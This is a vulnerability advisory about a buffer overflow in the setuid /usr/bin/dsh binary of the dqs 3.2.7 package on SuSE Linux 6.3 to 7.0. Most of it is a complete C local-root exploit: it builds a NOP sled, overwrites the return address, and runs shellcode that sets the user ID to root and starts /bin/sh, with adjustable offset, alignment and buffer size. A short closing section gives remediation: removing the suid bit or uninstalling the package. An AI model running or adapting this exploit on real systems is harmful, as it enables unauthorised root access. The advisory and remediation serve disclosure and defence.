COMMAND
dqs
SYSTEMS AFFECTED
dqs 3.2.7 (SusE 6.3, 6.4, 7.0 have the dqs 3.2.7 by default)
PROBLEM
'dex dex' found following. He found a buffer overflow
vunerability on the /usr/bin/dsh (dqs 3.2.7 package).
If a long line on the first argument is gived, the program gives
a SIGSEGV signal. SusE 6.3, 6.4, 7.0 have the dqs 3.2.7 by
default an then it are vunerable, maybe others.
You can found the exploit at
www.raza-mexicana.org/programas/programas/qsexp.c
And here it is:
/* - dqsexp.c - */
/********************************************************************/
/* /usr/bin/dsh(dqs 3.2.7 package) local root exploit. */
/* SuSE 6.3, 6.4, and 7.0 are vunerable. */
/* dex@raza-mexicana.org <> http://www.raza-mexicana.org */
/* Saludos: dr_fdisk^, yield, vlad, deadsector, trovalz, fatal, */
/* megaflop y a todo raza. que weba escribirlos todos XD. */
/* En especial saludos al espa~olete(NOP) :P, ya sabes porque. */
/* */
/* - dex@raza-mexicana.org <> http://www.raza-mexicana.org - */
/********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFFSIZE 2772
#define OFFSET 0
#define ALIGN 0
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
static char code[]= /* stolen
from mount.c :P */
"\x29\xc0" /* subl %eax, %eax */
"\xb0\x46" /* movb $70, %al */
"\x29\xdb" /* subl %ebx, %ebx */
"\xb3\x0c" /* movb $12, %bl */
"\x80\xeb\x0c" /* subb $12, %bl */
"\x89\xd9" /* movl %ebx, %ecx */
"\xcd\x80" /* int $0x80 */
"\xeb\x18" /* jmp callz */
"\x5e" /* popl %esi */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x07" /* movb %al, 0x07(%esi) */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\x89\x76\x08" /* movl %esi, 0x08(%esi) */
"\xb0\x0b" /* movb $0x0b, %al */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
"\xcd\x80" /* int $0x80 */
"\xe8\xe3\xff\xff\xff" /* call start */
"\x2f\x62\x69\x6e\x2f\x73\x68";
void main(int argc, char **argv) {
int i;
unsigned long addr;
char *buffer;
int offset=OFFSET;
int buffsize=BUFFSIZE;
int align=ALIGN;
if (argc > 1 ) offset = atoi(argv[1]);
if (argc > 2 ) align = atoi(argv[2]);
if (argc > 3 ) buffsize = atoi(argv[3]);
buffer = (char *)malloc(buffsize + 8);
addr = get_sp() - offset;
for(i = 0; i < buffsize; i += 4) {
*(long *)&buffer[i] = 0x90909090;
}
*(long *)&buffer[buffsize - 8] = addr;
*(long *)&buffer[buffsize - 4] = addr;
memcpy(buffer + buffsize - 8 - strlen(code) - align, code, strlen(code));
printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n");
printf("[*] /usr/bin/dsh(dqs 3.2.7 package) local root exploit.\n");
printf("[*] - dex@raza-mexicana.org <> http://www.raza-mexicana.org - \n");
printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
printf("[*] Address=0x%x, Align=%d, Offset=%d\n", addr, align, offset);
printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
printf("[*] Starting....\n");
execl("/usr/bin/dsh", "dsh", buffer, "/etc/motd", NULL);
}
SOLUTION
SuSE confirmed this vulnerability and that dqs has the setuid bit
on the file /usr/bin/dsh, but the package (as a package in the
clustering series) is not installed by default.
The fix (to remove the suid bit) is correct. If you have selected
to set the variable PERMISSION_SECURITY in /etc/rc.config to
"secure local" in SuSE-7.1 (recommended for security-enhanced
settings), you are not vulnerable. On SuSE-7.1, in addition to
the chmod command below, change the files /etc/permissions.*, too,
to reflect the removed suid bit.
If you do not need the dqs package, simply remove it using the
command rpm -e dqs
Of course, SuSE will provide update packages as soon as possible.
The original publisher (SCRI, Florida State University) is no
longer maintaining DQS or employing the original author, but has
also refused to relax distribution restrictions, making it
difficult to found a new developer community.